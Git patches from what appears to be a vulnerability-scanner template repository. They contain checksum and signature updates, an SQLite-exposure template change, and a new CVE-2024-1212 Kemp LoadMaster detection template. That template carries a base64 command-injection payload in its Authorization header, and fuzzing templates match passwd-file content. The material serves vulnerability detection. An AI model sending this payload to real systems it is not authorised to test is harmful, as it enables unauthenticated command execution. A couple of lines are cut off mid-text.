http/miscellaneous/email-extractor.yaml:5815f093718b70c0b64c4c423cd1ec8ab94f1281 @@ -4912,7 +4912,7 @@ http/miscellaneous/maxforwards-headers-detect.yaml:9d69555c1fc58f644b5ccf2644e0a http/miscellaneous/microsoft-azure-error.yaml:bfa3c53d4023d524a09ba3565bd3bf63204ac58a http/miscellaneous/moodle-changelog.yaml:9dbf59caabecc08967456fa3986046e33f4dbf43 http/miscellaneous/netflix-conductor-version.yaml:31ad2c649ff4aa0703a5c7cd4e36d2245a8993e0 -http/miscellaneous/ntlm-directories.yaml:5f40ea6a1dda6cd8654e61902adb60b877945de5 +http/miscellaneous/ntlm-directories.yaml:8d2b0ffc05206f993712a9bbd94071107bcda074 http/miscellaneous/old-copyright.yaml:de816764aefeaf59f75201740f4f82fb31071194 http/miscellaneous/options-method.yaml:2e0edc5993baa53c6fb7e8307c80ea26254bc3e4 http/miscellaneous/rdap-whois.yaml:c25cfe8b61f82c032de77398cf1aed94f56f0004 @@ -4958,7 +4958,7 @@ http/misconfiguration/aem/aem-secrets.yaml:346f23f7070fdf59c2c76fddd12a5eb4f31c7 http/misconfiguration/aem/aem-security-users.yaml:ff974be49aaee03897db4a6d40117b9e5d02598d http/misconfiguration/aem/aem-setpreferences-xss.yaml:dd08fc188a7ad278c8ee3082b66d9d2282d1c9e8 http/misconfiguration/aem/aem-sling-userinfo.yaml:f38274749b0668275a6b8cdddc2707bbde9eb1a0 -http/misconfiguration/aem/aem-userinfo-servlet.yaml:ad12a83b873c3e1bd09b0b675368f78013a26261 +http/misconfiguration/aem/aem-userinfo-servlet.yaml:47c5ab71db4a7fde4c72b30d1c273f2dc2e637b9 http/misconfiguration/aem/aem-wcm-suggestions-servlet.yaml:cc07ee10590df2dd7de1d03c73167bbd4d81b95b http/misconfiguration/aem/aem-xss-childlist-selector.yaml:a9ecdb229a17db9192821a583549813a1bb1fc3c http/misconfiguration/airflow/airflow-debug.yaml:c18746cecd6f440d9367f6ebe1ce70ff34e508af @@ -5073,7 +5073,7 @@ http/misconfiguration/gitlab/gitlab-public-repos.yaml:1a2b426983d0ca449461a9ece3 http/misconfiguration/gitlab/gitlab-public-signup.yaml:f604c8044baffdf63ed2215ccec5b5721202144b http/misconfiguration/gitlab/gitlab-public-snippets.yaml:64aa47f34d185b8bbbc04b242eb0a76886d641ec http/misconfiguration/gitlab/gitlab-uninitialized-password.yaml:d9959b940359896de41142fe765303a3627c7ae5 -http/misconfiguration/gitlab/gitlab-user-enum.yaml:f3372fa8a631a0249e5a108ac8e2d610a5a6ec71 +http/misconfiguration/gitlab/gitlab-user-enum.yaml:899a8a3e6898f4898986bb1bda5e248b360bd427 http/misconfiguration/gitlist-disclosure.yaml:8111ac3c10bc09b42d9c2bc565cd5758cb6a220e http/misconfiguration/global-traffic-statistics.yaml:f5ab7750ae4d32d8b857b8290bcd98ac1358fa0d http/misconfiguration/glpi-directory-listing.yaml:29bb88890e78f83428d00799224679dfd993e1bc @@ -5320,9 +5320,9 @@ http/misconfiguration/proxy/metadata-hetzner.yaml:99b85a4199e83eff23ec416b6b6fff http/misconfiguration/proxy/metadata-openstack.yaml:6e1984d2e3aa87e07e6b7db80dbd7c9d10c9d417 http/misconfiguration/proxy/metadata-oracle.yaml:93d94888c382735e755c96a1908859778f1308ef http/misconfiguration/proxy/open-proxy-external.yaml:e05b7e6f0744ee250192e9167a89b4d6c7dfdee1 -http/misconfiguration/proxy/open-proxy-internal.yaml:198c9a37e2ddb668d66fb1598d5f73784dca1a24 -http/misconfiguration/proxy/open-proxy-localhost.yaml:2a876eb905cbd8591af8d8c7cb8494fd2db314e9 -http/misconfiguration/proxy/open-proxy-portscan.yaml:10aaa6234f8c68a346e226e5bc615de2134ac10e +http/misconfiguration/proxy/open-proxy-internal.yaml:5de892d38ee34977924d4eb2cbd644b4b51fe567 +http/misconfiguration/proxy/open-proxy-localhost.yaml:4cd4b2b6c999578dff79a1d9d0aab65b759db464 +http/misconfiguration/proxy/open-proxy-portscan.yaml:e4806af440f78fced0b1239e83f9a5b440c4b4ee http/misconfiguration/puppetdb-dashboard.yaml:5b1f354f5ab9343e46a20bd7c76a8ee044cf71b4 http/misconfiguration/put-method-enabled.yaml:4cbb1715aeb73cf6e638b02c9951ff02c7a67756 http/misconfiguration/python-metrics.yaml:0b1d1102e4329ebf75ae5cc259898f1cb1cd9670 @@ -6447,7 +6447,7 @@ http/technologies/google-frontend-httpserver.yaml:de094bfafe3b5aea16e1bffb3ab80c http/technologies/graphiql-detect.yaml:a50e33498f73c5c27694fdad64d7d5f06dc1fe29 http/technologies/graphql-detect.yaml:a0566e15058b3aeb2d4dae77cc99d23355938dac http/technologies/grav-cms-detect.yaml:f353a0fa76204ccd1c894aa850f977fef8c769f1 -http/technologies/graylog/graylog-api-exposure.yaml:5a677a5db5ed943770e6f6a1c2cf4e6e8f947b36 +http/technologies/graylog/graylog-api-exposure.yaml:c669347801d0d2a1ec1f100228f4f48e99f28dd9 http/technologies/graylog-api-browser.yaml:5aaa8bff99b57cf700d0923b48778048789f2389 http/technologies/gunicorn-detect.yaml:4e32fda7d9483af8c21fd3ea7fa6669266e23d0d http/technologies/hanwang-detect.yaml:4866144f96b1fbc18567e10ad7732b8a1a8dfc5f @@ -7702,7 +7702,7 @@ http/vulnerabilities/thinkphp/thinkphp-509-information-disclosure.yaml:63ec56f7d http/vulnerabilities/tongda/tongda-action-uploadfile.yaml:26127f055c9c3ffa79366002ca95ea0c80a9c1dc http/vulnerabilities/tongda/tongda-api-file-upload.yaml:868bdf72215e96c1c0b2f2a4e68ecefa98bf453c http/vulnerabilities/tongda/tongda-arbitrary-login.yaml:813a5228a57a292be77d48351f979e9b4ce4bdcc -http/vulnerabilities/tongda/tongda-auth-bypass.yaml:4fd1922eebdd4690602da2a46f2db2aafdfcef26 +http/vulnerabilities/tongda/tongda-auth-bypass.yaml:f661e567e8d9b51bdf29cc07155b552b92beab20 http/vulnerabilities/tongda/tongda-contact-list-exposure.yaml:d1d9be064a074860683581a4e84f8e85a3abfc27 http/vulnerabilities/tongda/tongda-getdata-rce.yaml:b4452e0abc9faa89378a2d6b14c6ef99eddbb56d http/vulnerabilities/tongda/tongda-getway-rfi.yaml:02cae92f443ca026546155a79f51aab073d2a0dd @@ -7944,7 +7944,7 @@ http/vulnerabilities/wordpress/wp-vault-lfi.yaml:12ee639ae8dd7fb66560ac713aab3a4 http/vulnerabilities/wordpress/wp-woocommerce-email-verification.yaml:d36b1dafca4c01fbc15d17c4e884144f36974304 http/vulnerabilities/wordpress/wp-woocommerce-file-download.yaml:9cd53ef3a743e970ff37c36b2c9640781d578878 http/vulnerabilities/wordpress/wp-woocommerce-pdf-invoice-listing.yaml:0e1c6d447132c374e620d553de2cd8a8468f917e -http/vulnerabilities/wordpress/wp-xmlrpc-brute-force.yaml:f19c8ecb61fc6cb7a1d1c1f94898be756d976779 +http/vulnerabilities/wordpress/wp-xmlrpc-brute-force.yaml:9d1201fd282d799868a36ce2c49476f8c146711e http/vulnerabilities/wordpress/wp-xmlrpc-pingback-detection.yaml:f72f913987c22ad251d6b4b09e10fe57f20f0727 http/vulnerabilities/wordpress/wp-xmlrpc.yaml:b55a9ba158dc74c9797ce3cddb6464bf48106074 http/vulnerabilities/wordpress/wp-yoast-user-enumeration.yaml:ec8dd93cf0c3f663465b7191136013def01f5d0f @@ -7985,13 +7985,13 @@ http/vulnerabilities/zzzcms/zzzcms-info-disclosure.yaml:daa2040c8238fbe51311e7ac http/vulnerabilities/zzzcms/zzzcms-ssrf.yaml:80348e0fda22d428224a9a62afae01b8380694a0 http/vulnerabilities/zzzcms/zzzcms-xss.yaml:61a6fd65556054e8e2a631080388aff7aed42f6b javascript/cves/2016/CVE-2016-8706.yaml:823829801f090b3c8aa0b65a21f506da440cb2a0 -javascript/cves/2023/CVE-2023-34039.yaml:99873aefa26ca441bdea56e83f1433ddc11054c4 +javascript/cves/2023/CVE-2023-34039.yaml:15973462461926ddb4e6991f45579aa54ae7fc29 javascript/cves/2023/CVE-2023-46604.yaml:5f4409197ba9dd7f86ae5de4beb6409ce7f1bfb8 javascript/cves/2024/CVE-2024-23897.yaml:2de4bb803c9ebd5e8a989cc1760102ea53ee95d3 javascript/default-logins/mssql-default-logins.yaml:b95502ea9632648bc430c61995e3d80d0c46f161 javascript/default-logins/postgres-default-logins.yaml:0b960d1c695d009536b0846c5a393731d3fac7ad javascript/default-logins/redis-default-logins.yaml:f9a03987fac4e8150d9b8d5ab80779c6f41d8b7f -javascript/default-logins/ssh-default-logins.yaml:18115e88843b935c771139ba788aa321a8a8e75b +javascript/default-logins/ssh-default-logins.yaml:63a239d5a020912bf1e33b4ff59606e25181afe3 javascript/detection/mssql-detect.yaml:3dad2c227b904cc228247a86bf0372c5b2544b94 javascript/detection/oracle-tns-listener.yaml:3d274f668de183b62c79c04782bf0740150b4423 javascript/detection/ssh-auth-methods.yaml:7240dac7d7ee80f4aebf95f7ddf7a540874adf04 @@ -8136,10 +8136,10 @@ network/misconfig/erlang-daemon.yaml:5360cef90f48dc3c6bdab6df6e44245f243f423c network/misconfig/ganglia-xml-grid-monitor.yaml:dac3b1babe27265e34d19b1bac7388d65f89281b network/misconfig/memcached-stats.yaml:18844aac24b0279e3bb974baccf32256d5482109 network/misconfig/mongodb-unauth.yaml:0a25bf55d5fedd1b56c397ae27e93483018ae16a -network/misconfig/mysql-native-password.yaml:214396d10e5a824362e0184c365b862581629394 +network/misconfig/mysql-native-password.yaml:a9f7b3791ec021bec37c88303be460decc98069f network/misconfig/printers-info-leak.yaml:3eaf0fc4e07c21308b3bd7f387f2f6765979ad15 network/misconfig/sap-router-info-leak.yaml:a7ebbd8a06f5add2a3ded6259da9b3b3b5e0f005 -network/misconfig/tidb-native-password.yaml:140577255bfbe46ab1c88e594405a34b889a56f8 +network/misconfig/tidb-native-password.yaml:cee939c1ed6cf22fbd0fc3d2d6b4047ab02a5fa0 network/misconfig/tidb-unauth.yaml:5c00fa571b47b099a046afc2a7ff5aba4bfd20fd network/misconfig/unauth-psql.yaml:4234beb83e518739f430de109340c402c96a3740 network/vulnerabilities/clockwatch-enterprise-rce.yaml:3b34549e3d1b3ddcddab7a8cdfd7b9c57c8f2d37 @@ -8170,7 +8170,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:f6eaac90af8e77b23be2e3482cf5afbd3b015566 +templates-checksum.txt:59b8ce63bd6dd7ced361b025574c2da600135edb wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 2ede6795a64558bc26b2a6b5455a12888608f8ba Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 19 Mar 2024 16:40:41 +0000 Subject: [PATCH 16/86] Auto Template Signing [Tue Mar 19 16:40:41 UTC 2024] :robot: --- cloud/enum/azure-vm-cloud-enum.yaml | 2 +- http/cves/2017/CVE-2017-17562.yaml | 2 +- http/cves/2019/CVE-2019-17382.yaml | 2 +- http/cves/2022/CVE-2022-2034.yaml | 2 +- http/cves/2022/CVE-2022-2599.yaml | 2 +- http/cves/2023/CVE-2023-24489.yaml | 2 +- http/default-logins/oracle/peoplesoft-default-login.yaml | 2 +- http/exposed-panels/adminer-panel-detect.yaml | 2 +- http/exposures/backups/php-backup-files.yaml | 2 +- http/fuzzing/cache-poisoning-fuzz.yaml | 2 +- http/fuzzing/header-command-injection.yaml | 2 +- http/fuzzing/iis-shortname.yaml | 2 +- http/fuzzing/linux-lfi-fuzzing.yaml | 2 +- http/fuzzing/mdb-database-file.yaml | 2 +- http/fuzzing/prestashop-module-fuzz.yaml | 2 +- http/fuzzing/ssrf-via-proxy.yaml | 2 +- http/fuzzing/valid-gmail-check.yaml | 2 +- http/fuzzing/waf-fuzz.yaml | 2 +- http/fuzzing/wordpress-plugins-detect.yaml | 2 +- http/fuzzing/wordpress-themes-detect.yaml | 2 +- http/fuzzing/wordpress-weak-credentials.yaml | 2 +- http/fuzzing/xff-403-bypass.yaml | 2 +- http/miscellaneous/defacement-detect.yaml | 2 +- http/miscellaneous/ntlm-directories.yaml | 2 +- http/misconfiguration/aem/aem-userinfo-servlet.yaml | 2 +- http/misconfiguration/gitlab/gitlab-user-enum.yaml | 2 +- http/misconfiguration/proxy/open-proxy-internal.yaml | 2 +- http/misconfiguration/proxy/open-proxy-localhost.yaml | 2 +- http/misconfiguration/proxy/open-proxy-portscan.yaml | 2 +- http/technologies/graylog/graylog-api-exposure.yaml | 2 +- http/vulnerabilities/tongda/tongda-auth-bypass.yaml | 2 +- http/vulnerabilities/wordpress/wp-xmlrpc-brute-force.yaml | 2 +- javascript/cves/2023/CVE-2023-34039.yaml | 2 +- javascript/default-logins/ssh-default-logins.yaml | 2 +- network/misconfig/mysql-native-password.yaml | 2 +- network/misconfig/tidb-native-password.yaml | 2 +- 36 files changed, 36 insertions(+), 36 deletions(-) diff --git a/cloud/enum/azure-vm-cloud-enum.yaml b/cloud/enum/azure-vm-cloud-enum.yaml index 62be7fe992..87785a91a7 100644 --- a/cloud/enum/azure-vm-cloud-enum.yaml +++ b/cloud/enum/azure-vm-cloud-enum.yaml @@ -63,4 +63,4 @@ dns: part: answer words: - "IN\tA" -# digest: 4a0a00473045022100ad529d9d011c813ce7e0cb419a8440ca3f0bef3ca063b85560dbc678d6eb7056022022aa46f55179a7b72c6a02dcda0444e0aba98ddaa781c8118d39acd5cafdeaaf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402200614bd35195e042742d9840244b46d9f68e4918956d5672a7549edaedbfe5f2e022051271716ac72339c39f76569585c0a256b19ce6238da5e3ea6a9d36b2d80011e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-17562.yaml b/http/cves/2017/CVE-2017-17562.yaml index a19b300778..131d83b131 100644 --- a/http/cves/2017/CVE-2017-17562.yaml +++ b/http/cves/2017/CVE-2017-17562.yaml @@ -117,4 +117,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100dec8b43170cf34ed98fbf83c8dc09389ffefda9fd823a123f509f32dbb63cc570220638e59f0bec3b3ab5a49d51408722e58ca5276e415dfaa2cb4821b2c65b295ac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220121da3e7b07d35d6cc36396744f512a33ad3dc1ba36b7f99975e68d99f7950e50220073fc66cac1e0ba2aba9a53106e851591967dd64abdeb8b4d199284261e0417d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-17382.yaml b/http/cves/2019/CVE-2019-17382.yaml index babc75564f..4df57d8acb 100644 --- a/http/cves/2019/CVE-2019-17382.yaml +++ b/http/cves/2019/CVE-2019-17382.yaml @@ -48,4 +48,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220626b2ab1255806a015af4a5a877b4cc26870eaa35262c5980d85b262263b2bad022029a7a7154e81df1a32ffc290eadfb2dfe71fd5c7dc9fbadbf4bc92c421ea6a48:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402206e060526ed498e58aeb165e1a86c6dfb0f822270df28b1f37de9879abeb9453502205623412e5aa23b5444d28233dc3a09dd053b5d8c1d4138adc4bd5cf524207012:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-2034.yaml b/http/cves/2022/CVE-2022-2034.yaml index 81846921c0..feb23e7198 100644 --- a/http/cves/2022/CVE-2022-2034.yaml +++ b/http/cves/2022/CVE-2022-2034.yaml @@ -56,4 +56,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402207c51a21553085f96246b9b7a7b8fcb17455c8ede92140fc56ac74b94c60b3fcf022054295c2dbda0cd3975caa9c8ac89cd1d99b8f237e8fe3258e096d29e53f99f61:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220495ab4eeb68248ce94758f27eab64434c32477db41d51efff29e248a0bee54a102204decc78a0d04e9931c1440579656391f3cd9c5e45d86f0b672c44c99bc942d72:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-2599.yaml b/http/cves/2022/CVE-2022-2599.yaml index 71cb695804..fc99092981 100644 --- a/http/cves/2022/CVE-2022-2599.yaml +++ b/http/cves/2022/CVE-2022-2599.yaml @@ -60,4 +60,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100eef0f765c6118556853d7fbe2dacb78f2e80b4b820d56e883878df1688544eb402205baf46c82ff1df66387173dd365185b8a1517ac070ededd1288d324488f2b15a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022059cd96c86ae45ea4aa0ae09c6c3740e9225be1edfbafa84a38473cad7830094d022100e1627acd2f09e5f64cb1285bd45bad4f3b7d95657dff74b6310bbcfdcf01c8c5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-24489.yaml b/http/cves/2023/CVE-2023-24489.yaml index 84207995d6..8a0e8a9801 100644 --- a/http/cves/2023/CVE-2023-24489.yaml +++ b/http/cves/2023/CVE-2023-24489.yaml @@ -60,4 +60,4 @@ http: - type: dsl dsl: - 'BaseURL+ "/cifs/" + fileName + ".aspx"' -# digest: 4a0a00473045022100d934886760e9ccd26b8fc8bb22de25e8dd46427d5b1b2c0773a84cba9646446002206093910f6613687b25b29229ba4f688d9a5721012f2691c8079cdcc61a203332:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402205da7cab8d8af553734b5f1c9203e90944a89fecdb12b73130bd97a508abf49bb022024325216beeb52a5e651a6cc678fc4dfa622158a1a0535f6464bb780be2f111a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/default-logins/oracle/peoplesoft-default-login.yaml b/http/default-logins/oracle/peoplesoft-default-login.yaml index 5efacaf70e..101d43d24e 100644 --- a/http/default-logins/oracle/peoplesoft-default-login.yaml +++ b/http/default-logins/oracle/peoplesoft-default-login.yaml @@ -82,4 +82,4 @@ http: - type: status status: - 302 -# digest: 490a00463044022050a7ba41878e766a7453e20f034e337465bb2c7e07eda9ce12ec916ed28df2d202205e97d0b986bb626f7127189fc4f889109ba9f20801a5a72cc406f9e6dcf5db4e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022021caed0d7676a38577b2c3d3b6a6549f5bcb9942d4b96265587f639ae486006502203ec6b9e3cce73f65f0aaffe2ae6ea2835d44c5431bd579f08d3fe2450ccedb74:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/adminer-panel-detect.yaml b/http/exposed-panels/adminer-panel-detect.yaml index 8f3282ffe1..6778f37ea0 100644 --- a/http/exposed-panels/adminer-panel-detect.yaml +++ b/http/exposed-panels/adminer-panel-detect.yaml @@ -53,4 +53,4 @@ http: group: 1 regex: - '([0-9.]+)' -# digest: 4a0a00473045022100ee20baf11aa5604db68aa1754dd077e912192bd19c3e3586c7442a697f6ac22102204c689729457b6f71c285dfe1309b72f23ba46b69516e80c2baaad9b20bd4b77a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d1fcc4e636bdb5f3961f4541594d60ac0dc86688a2cda52de2530fbf4ca9b770022100d68508fb2d73378f62f821365ccc2f11f063da2ae73ded7792159a9a1c97e373:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposures/backups/php-backup-files.yaml b/http/exposures/backups/php-backup-files.yaml index a6fba70644..ca54085937 100644 --- a/http/exposures/backups/php-backup-files.yaml +++ b/http/exposures/backups/php-backup-files.yaml @@ -136,4 +136,4 @@ http: - "text/plain" - "bytes" condition: or -# digest: 4b0a00483046022100c733de0ef40feb46f3e0d6ba5996c622340ad6910a6ea85e9c1c4e8aa1939cd2022100b73afbe7b608bdd57d018fe31bdc23a620f2e6b965916193232c840782ef90d0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022019ff7dd3ceced23dec05a238feaf346674305dde6a4a6613b965cf8d0500acfc02210092bbcbb84d7180e46714712507b6e6b108317250bc01d99b3d8eee50b2d7f393:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/fuzzing/cache-poisoning-fuzz.yaml b/http/fuzzing/cache-poisoning-fuzz.yaml index 9e0174b891..df817453b6 100644 --- a/http/fuzzing/cache-poisoning-fuzz.yaml +++ b/http/fuzzing/cache-poisoning-fuzz.yaml @@ -34,4 +34,4 @@ http: - 'contains(body_1, "{{randstr}}")' - 'contains(body_2, "{{randstr}}")' condition: and -# digest: 4b0a00483046022100bba6a80d36a07519a4f1b8528ccff3881319bdcd199c51e9d78c319e8832cac8022100f86715b3dbd1438e11a557d63175be67feddc557a7e0bbfcfa6c1b764a48aa0d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100893d371d193cc0f4111cf8b61a2d092bf7820039aa9a6eecf49529c0d59ac41702201b80bdfb4007c9173b4cff9a55590cf605b0918021c8bbd96b3cc0294ecd5124:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/fuzzing/header-command-injection.yaml b/http/fuzzing/header-command-injection.yaml index 9863e8e4b0..076ec7b5ac 100644 --- a/http/fuzzing/header-command-injection.yaml +++ b/http/fuzzing/header-command-injection.yaml @@ -39,4 +39,4 @@ http: - type: regex regex: - "root:.*:0:0:" -# digest: 4a0a0047304502203dfb9d94713bdd57f01a1037a1a475e92c22c7f2917019840a194b6d93960fe5022100d2d94c46b98286546a9bd02fe1229a1fb36b8d4e40d0dd981d1ad31662ab0a3c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022044f5c4ce901be80e947968eba35f25a3f9606a5cd8936480fd0cf89bde3edf4f022041fe2163a6b12dcb07d1e872f3051eb642e9b10dcf52f59d3e5a9a8107cf7434:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/fuzzing/iis-shortname.yaml b/http/fuzzing/iis-shortname.yaml index d6da7ac5b6..743eaa51ed 100644 --- a/http/fuzzing/iis-shortname.yaml +++ b/http/fuzzing/iis-shortname.yaml @@ -44,4 +44,4 @@ http: - type: dsl dsl: - "status_code_1!=404 && status_code_2 == 404 || status_code_3 != 404 && status_code_4 == 404" -# digest: 4b0a004830460221009bb41d08061c1ba58f9ba9d6da08c33ade50b3877f2e7aec5ecd20bb45a8b2f6022100e43b897605b6c1cb2720b460ebe592eceecec9662a9b51717e07568020ebcee2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502207f1f208de9031454a3413b7b13977ee8f563be5c0ad83771de6897fa56a46c7f022100ab113072a9c2f91610fedd3a50cae51b16e01fca22b04c80bfdd675f86c0e45b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/fuzzing/linux-lfi-fuzzing.yaml b/http/fuzzing/linux-lfi-fuzzing.yaml index d21b76eb01..83913e46ba 100644 --- a/http/fuzzing/linux-lfi-fuzzing.yaml +++ b/http/fuzzing/linux-lfi-fuzzing.yaml @@ -45,4 +45,4 @@ http: regex: - "root:.*:0:0:" part: body -# digest: 4a0a004730450220530a89eabafecafbf0a3de2f0ba62e33e25cefd85b20289a912eb5a15603ad51022100c63b246226590dd18a0c6e10508d8c5aed77d6ba23037197d980799866a876c1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210087a307489eb418f0906031bfc714587a7a63d61d3d748d51d61d33634454363502205b0a0800d1c4a85649d92cc90161e84a8539243c735643c99f74bc57483a3d77:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/fuzzing/mdb-database-file.yaml b/http/fuzzing/mdb-database-file.yaml index 3239da2aee..9b67344fe9 100644 --- a/http/fuzzing/mdb-database-file.yaml +++ b/http/fuzzing/mdb-database-file.yaml @@ -44,4 +44,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502207843690e40ef53160e535662659535e27e49d4c23da29954cf7bae6db715b98c022100b90846e49879ba649cdd9e5bf68edd48a79c2d56641eaaa31d184f794a2e5d7f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a9c05c6a0c6579c0639a578b69157823126b4bc4badc33f4dcb52408d2fbd2960220798dd8340f94afec52275e40be3cdcf758b8a052afb2e0233aa34653cb33f22d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/fuzzing/prestashop-module-fuzz.yaml b/http/fuzzing/prestashop-module-fuzz.yaml index 812dc64365..f03a8ca4b3 100644 --- a/http/fuzzing/prestashop-module-fuzz.yaml +++ b/http/fuzzing/prestashop-module-fuzz.yaml @@ -43,4 +43,4 @@ http: group: 2 regex: - '( Date: Wed, 20 Mar 2024 01:19:14 +0530 Subject: [PATCH 17/86] Create CVE-2024-1212.yaml --- http/cves/2024/CVE-2024-1212.yaml | 47 +++++++++++++++++++++++++++++++ 1 file changed, 47 insertions(+) create mode 100644 http/cves/2024/CVE-2024-1212.yaml diff --git a/http/cves/2024/CVE-2024-1212.yaml b/http/cves/2024/CVE-2024-1212.yaml new file mode 100644 index 0000000000..6068d1e1b0 --- /dev/null +++ b/http/cves/2024/CVE-2024-1212.yaml @@ -0,0 +1,47 @@ +id: CVE-2024-1212 + +info: + name: Progress Kemp LoadMaster - Unauthenticated Command Injection + author: DhiyaneshDK + severity: critical + description: | + Unauthenticated remote attackers can access the system through the LoadMaster management interface, enabling arbitrary system command execution. + reference: + - https://rhinosecuritylabs.com/research/cve-2024-1212unauthenticated-command-injection-in-progress-kemp-loadmaster + - https://freeloadbalancer.com/ + - https://kemptechnologies.com/ + - https://support.kemptechnologies.com/hc/en-us/articles/23878931058445-LoadMaster-Security-Vulnerability-CVE-2024-1212 + - https://support.kemptechnologies.com/hc/en-us/articles/24325072850573-Release-Notice-LMOS-7-2-59-2-7-2-54-8-7-2-48-10-CVE-2024-1212 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10 + cve-id: CVE-2024-1212 + cwe-id: CWE-78 + epss-score: 0.00046 + epss-percentile: 0.13478 + metadata: + verified: true + max-request: 1 + shodan-query: html:"LoadMaster" + tags: cve,cve2024,progress,rce,loadmaster + +http: + - method: GET + path: + - "{{BaseURL}}/access/set?param=enableapi&value=1" + headers: + Authorization: "Basic JztsczsnOmRvZXNub3RtYXR0ZXI=" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "bin" + - "mnt" + - "WWW-Authenticate: Basic" + condition: and + + - type: status + status: + - 200 From 717075e5b3a292a95612bb62de7ff3060e61b1ba Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 20 Mar 2024 09:33:12 +0530 Subject: [PATCH 18/86] Update generic-db.yaml --- http/exposures/files/generic-db.yaml | 24 ++++++++---------------- 1 file changed, 8 insertions(+), 16 deletions(-) diff --git a/http/exposures/files/generic-db.yaml b/http/exposures/files/generic-db.yaml index 811540a3c6..0ac1962fbf 100644 --- a/http/exposures/files/generic-db.yaml +++ b/http/exposures/files/generic-db.yaml @@ -1,7 +1,7 @@ id: generic-db info: - name: Generic DB file exposure + name: Generic Database File - Exposure author: Michal Mikolas (nanuqcz) severity: high description: This is collection of some web frameworks recommendation or default configuration for SQLite database file location. If this file is publicly accessible due to server misconfiguration, it could result in application data leak including users sensitive data, password hashes etc. @@ -41,8 +41,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 metadata: - verified: true - tags: database,exposure,sqlite,sqlite3 + max-request: 89 + tags: files,database,exposure,sqlite,sqlite3 http: - method: GET @@ -140,19 +140,11 @@ http: - "{{BaseURL}}/database/production.db" - "{{BaseURL}}/database/production.sqlite3" - matchers-condition: and matchers: - - type: status - status: - - 200 - - # SQLite file always starts with "SQLite format {sqlite_version}" - type: dsl dsl: - - 'startswith(body, "SQLite format ")' - - # SQLite file usually contains "CREATE TABLE", meaning there is at least one table - - type: word - part: body - words: - - "CREATE TABLE " + - 'startswith(body, "SQLite")' # SQLite file always starts with "SQLite format {sqlite_version}" + - 'contains(body, "CREATE TABLE")' # SQLite file usually contains "CREATE TABLE", meaning there is at least one table + - '!contains(body, " Date: Wed, 20 Mar 2024 09:36:02 +0530 Subject: [PATCH 19/86] Update CVE-2024-1212.yaml --- http/cves/2024/CVE-2024-1212.yaml | 5 ++--- 1 file changed, 2 insertions(+), 3 deletions(-) diff --git a/http/cves/2024/CVE-2024-1212.yaml b/http/cves/2024/CVE-2024-1212.yaml index 6068d1e1b0..f2464b4726 100644 --- a/http/cves/2024/CVE-2024-1212.yaml +++ b/http/cves/2024/CVE-2024-1212.yaml @@ -1,17 +1,16 @@ id: CVE-2024-1212 info: - name: Progress Kemp LoadMaster - Unauthenticated Command Injection + name: Progress Kemp LoadMaster - Command Injection author: DhiyaneshDK severity: critical description: | Unauthenticated remote attackers can access the system through the LoadMaster management interface, enabling arbitrary system command execution. reference: - https://rhinosecuritylabs.com/research/cve-2024-1212unauthenticated-command-injection-in-progress-kemp-loadmaster - - https://freeloadbalancer.com/ - - 